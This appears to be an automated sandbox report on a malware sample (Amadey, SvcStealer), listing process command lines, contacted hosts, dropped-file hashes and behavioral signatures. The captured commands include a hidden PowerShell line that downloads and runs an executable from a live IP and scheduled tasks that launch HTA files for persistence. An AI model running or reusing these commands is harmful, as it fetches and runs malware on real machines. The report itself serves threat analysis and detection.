schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE
"C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "O5x0ImaVemy" /tr "mshta \"C:\Temp\8dw7RzrvO.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\8dw7RzrvO.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\system32\taskeng.exe
taskeng.exe {0102F77C-CFAE-4625-AABC-402260BBCF85} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\ProgramData\djrq\nbiciq.exe
C:\ProgramData\djrq\nbiciq.exe
C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe
"C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 104.21.31.208:443 | explorebieology.run | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 172.67.212.102:443 | codxefusion.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| N/A | 127.0.0.1:49647 | | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | drunkeflavorz.pw | udp |
| US | 104.21.31.208:443 | explorebieology.run | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
| MD5 | 42bcecbc4a9d0c9e72120f0a60102147 |
| SHA1 | 026d375bc2a684027fb8532af83ce2991509e1f1 |
| SHA256 | 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b |
| SHA512 | d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498 |
\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
| MD5 | 3147e388f1f2ad94f26aee55a4267b8c |
| SHA1 | b3dfd5bb152b1b8e338586ea1e2d240cde6503b3 |
| SHA256 | 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b |
| SHA512 | 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9 |
C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
| MD5 | 9dadf2f796cd4500647ab74f072fd519 |
| SHA1 | 92b6c95a6ed1e120488bd28ac74274e874f6e740 |
| SHA256 | e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76 |
| SHA512 | fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d |
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
| MD5 | 001d7acad697c62d8a2bd742c4955c26 |
| SHA1 | 840216756261f1369511b1fd112576b3543508f7 |
| SHA256 | de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af |
| SHA512 | f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb |
\Windows\Temp\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
| MD5 | eff9e9d84badf4b9d4c73155d743b756 |
| SHA1 | fd0ad0c927617a3f7b7e1df2f5726259034586af |
| SHA256 | d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad |
| SHA512 | 0006273c86e8130e06e705a2be46c3433c0d1b34463123354c1857ebf88503d6e7e90602dc40960351baa03155074f8c5834b251be9da90fd95b10e498a98a19 |
\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\Quadrisyllable.dll
| MD5 | a1e561bc201a14277dfc3bf20d1a6cd7 |
| SHA1 | 1895fd97fb75ad6b59fc6d2222cf36b7dc608b29 |
| SHA256 | 7ae39cb5cd14a875af3e43df4a309d6a7a44c0339c413bf21b0300c84e35b66c |
| SHA512 | aaa4e7350094dc7574e5f18ce619f48a45062674353f0f2a340a1fea0055c7961a9b257455d8ea877d739635e3444df08f049484f48fa9729d8fb1667374cf3c |
\Windows\Temp\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
| MD5 | 1f166f5c76eb155d44dd1bf160f37a6a |
| SHA1 | cd6f7aa931d3193023f2e23a1f2716516ca3708c |
| SHA256 | 2d13424b09ba004135a26ccd60b64cdd6917d80ce43070cbc114569eae608588 |
| SHA512 | 38ad8f1308fe1aae3ddf7dbc3b1c5442663571137390b3e31e2527b8fec70e7266b06df295df0c411fcc500424022f274fd467d36040def2e1a4feff88c749b7 |
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
| MD5 | 30c1a6337089e68b975438caebc8f497 |
| SHA1 | 2cf2324672cf72b9bc1869633f3bf6904bb61011 |
| SHA256 | db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017 |
| SHA512 | be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484 |
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarAF0B.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
| MD5 | 7ff72f21d83d3abdc706781fb3224111 |
| SHA1 | 3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8 |
| SHA256 | 0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea |
| SHA512 | dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d |
C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
| MD5 | 971c0e70de5bb3de0c9911cf96d11743 |
| SHA1 | 43badfc19a7e07671817cf05b39bc28a6c22e122 |
| SHA256 | 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d |
| SHA512 | a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2 |
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
| MD5 | 3babce4f85902c7bcfde22e222508c4e |
| SHA1 | 4898ae5c075322b47ab2f512b5463ee6116d98f7 |
| SHA256 | 06b678b55cb81e6999b25903def2ac02336dc6c9ff3cd6afdaafffd55e2e5302 |
| SHA512 | f8687729c8931579f8120f6451f669726f115123c10a7c5ce6d9a24746940153efcf7e33b719e8f543f9b4316db485633272943f462bf948b4044f234795d629 |
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
| MD5 | 19668940080169c70b830bed8c390783 |
| SHA1 | 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1 |
| SHA256 | cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c |
| SHA512 | c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2 |
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
| MD5 | e82c4c3f7a2994eeecc1f81a5e4a4180 |
| SHA1 | 660820f778073332dcd5ec446d2fcf00de887abd |
| SHA256 | 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3 |
| SHA512 | 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76 |
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
| MD5 | 02579a797e919dcaf5758fbcbe34b093 |
| SHA1 | 7668fff0888f4c7ad7a83b24f8c6d4009c10e534 |
| SHA256 | 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c |
| SHA512 | 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5 |
C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
| MD5 | f53198e8b444658cf7134f5ccb466a98 |
| SHA1 | 0283e56ed7201eecfc7dad30cc6f3f30d677be66 |
| SHA256 | 936004bbb9d3c4763c0e36cc887b21315ae6c2d55c366cb3b3390d480b827107 |
| SHA512 | ee40f63f7b75cc1b55d11c56c25086d2d66ae86a3f65326d5a75cf0f2fac94ebee622cd4844b4f6468b2bfd011ab80558f41e1b62d2a7864b0ce7f61d3bdcf09 |
C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
| MD5 | 22892b8303fa56f4b584a04c09d508d8 |
| SHA1 | e1d65daaf338663006014f7d86eea5aebf142134 |
| SHA256 | 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f |
| SHA512 | 852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744 |
C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe
| MD5 | da3a7687a7f215bbbc93fe62e0afa1ea |
| SHA1 | ee56166cf511655e53b4bbd796247c9810037476 |
| SHA256 | 231b4d3c2b060b288878d7c28fb536c22f3844a54bf003eaf3b0da4808ffd63d |
| SHA512 | 374c8ecdfbd339f0064c9c799ff428086e49e82c053ddcb25b3a84c850ad6c1fa009f8833804330e8c16c489088496dbbdc74f6ee6970be4f0e2e996ed2cd75a |
C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YYMSUYSSQ3CAKYLT6H5V.temp
| MD5 | 29c618e15d21bc79ac7d3b3af1291cef |
| SHA1 | 372437f7e7ffa08dc419ec8caef214063e257107 |
| SHA256 | 1562cc7e2bb4afa829250ff827198b5490f32ea8da9264a08c8e38fe66ce9e45 |
| SHA512 | 26450f65deed7c371c78c4864b7f4571e8f354c258469c2a8cd6c107e5a5dd8f1e0d06bbf1cb3b6af616d8efb8fe7efac479ec5204d68a26da9fa91526a740ef |
C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe
| MD5 | 77c8daa35f8fa536031bca64e567107b |
| SHA1 | 0524411a8f30adf2b1d95c071eaa4ff900c9b702 |
| SHA256 | d0c87ac8cb00fd5d5aedbdeb6c747327969ae5ba1d031b902697ac5a9aa5fb02 |
| SHA512 | dbcc132580a51abc93a36cf1303a5139937a3e556902c28f516185d940b7a49217f4dd50ccad92a763b5e1e9563b963bed2d713fb45497c56f93bba59cb0bedd |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 03:56
Reported
2025-03-05 03:57
Platform
win10v2004-20250217-en
Max time kernel
34s
Max time network
46s
Command Line
Signatures
Amadey
Amadey family
Detects SvcStealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SvcStealer, Diamotrix
Svcstealer family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cebafffffcbc = "\"C:\\ProgramData\\cebafffffcbc.exe\"" | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
